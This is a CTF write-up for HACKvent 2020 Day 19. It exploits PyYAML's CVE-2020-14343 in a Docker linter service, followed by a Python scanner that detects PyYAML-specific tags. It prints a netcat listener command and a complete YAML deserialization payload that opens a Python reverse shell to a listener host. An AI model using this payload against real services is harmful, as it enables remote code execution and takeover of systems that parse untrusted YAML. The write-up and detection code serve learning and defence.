HACKvent 2020 - Day 19

01-01-2021 - 1 minute, 0 seconds - CTF

Challenge - Docker Linter Service

Docker Linter is a useful web application ensuring that your Docker-related files follow best practices. Unfortunately, there’s a security issue in there…

Requirements

This challenge requires a reverse shell. You can use the provided Web Shell or the VPN to solve this challenge (see RESOURCES on top).

Note: The VPN connection information has been updated.

Solution

Today's challenge provides us with an instance of a Docker linter. It can lint "dockerfile", "docker-compose.yml" and ".env" files.

Each linter's output names the tools it runs and their results, so we learn that the following tools are applied:

  • hadolint
  • dockerfile_lint
  • dockerlint.js
  • yamllint
  • docker-compose
  • dotenv-linter

After a brief investigation, it turns out that the Python YAML library “pyyaml”, most likely used by yamllint, has a known remote code execution vulnerability that was still unfixed as of 2020-12-19 (CVE-2020-14343).

So we start netcat, our local listener:

nc -l -v -p 4578

and try to exploit the vulnerability described in the GitHub issue with a typical Python reverse shell:

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.13.0.14',4578));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh')"

And there we have a connection! The flag is also found quickly:

[Screenshot: connection to the reverse shell]

HV20{pyy4ml-full-l04d-15-1n53cur3-4nd-b0rk3d}
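The payload above only executes because the input reaches a loader that still constructs `python/` tags (FullLoader, the loader CVE-2020-14343 concerns); `yaml.safe_load` has no constructors for them. As an added example for this write-up (not code from the challenge or from PyYAML), here is an ingress check a linter service could run on client-supplied YAML; it goes beyond the page by catching the verbatim and `%TAG` spellings of the same tags, not just `!!python/`. It assumes PyYAML is installed for `load_untrusted`; the scanner itself is stdlib only and the samples are constructed.

```python
import re
from typing import List, Tuple

PY_NS = "tag:yaml.org,2002:python/"

# Three spellings of the same tag namespace:
#  1. shorthand  !!python/name:exec
#  2. verbatim   !<tag:yaml.org,2002:python/name:exec>
#  3. a %TAG directive rebinding some handle to the python/ namespace, after
#     which an innocent-looking !h!name:exec resolves to the same tag.
_SHORTHAND = re.compile(r"!!python/[^\s\]\},]*")
_VERBATIM = re.compile(r"!<" + re.escape(PY_NS) + r"[^>]*>")
_DIRECTIVE = re.compile(r"^%TAG\s+(!\S*)\s+" + re.escape(PY_NS), re.M)

# Constructed samples: the tag shapes from the write-up's payload, the two
# other spellings, and a clean docker-compose fragment that must pass.
SAMPLES = {
    "shorthand": '!!python/object/new:type\n  args: ["z", !!python/tuple [], {}]\n',
    "verbatim": "x: !<tag:yaml.org,2002:python/name:str> 'a'\n",
    "directive": "%TAG !p! tag:yaml.org,2002:python/\n--- !p!name:str 'a'\n",
    "clean": "version: '3'\nservices:\n  web:\n    image: nginx:1.19\n",
}

def find_python_tags(text: str) -> List[Tuple[int, str]]:
    """Return (line, matched_text) for every PyYAML-only tag in the document."""
    hits = set()
    handles = []
    for m in _DIRECTIVE.finditer(text):
        handles.append(re.escape(m.group(1)))
        hits.add((text.count("\n", 0, m.start()) + 1, m.group(0)))
    patterns = [_SHORTHAND, _VERBATIM]
    if handles:  # anything using a rebound handle is now a python/ tag
        patterns.append(re.compile(r"(?:%s)[^\s\]\},]+" % "|".join(handles)))
    for pat in patterns:
        for m in pat.finditer(text):
            hits.add((text.count("\n", 0, m.start()) + 1, m.group(0)))
    return sorted(hits)

def load_untrusted(text: str):
    """Parse client-supplied YAML: refuse (and let the caller log) python/ tags,
    then use safe_load, whose SafeLoader has no constructors for them anyway."""
    hits = find_python_tags(text)
    if hits:
        raise ValueError("refusing YAML with PyYAML-specific tags: %r" % hits)
    import yaml  # PyYAML (assumed installed); lazy so the scanner works without it
    return yaml.safe_load(text)
```

The refusal is a detection and logging layer; the actual fix is that nothing downstream ever calls `yaml.load` or `FullLoader` on this input.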
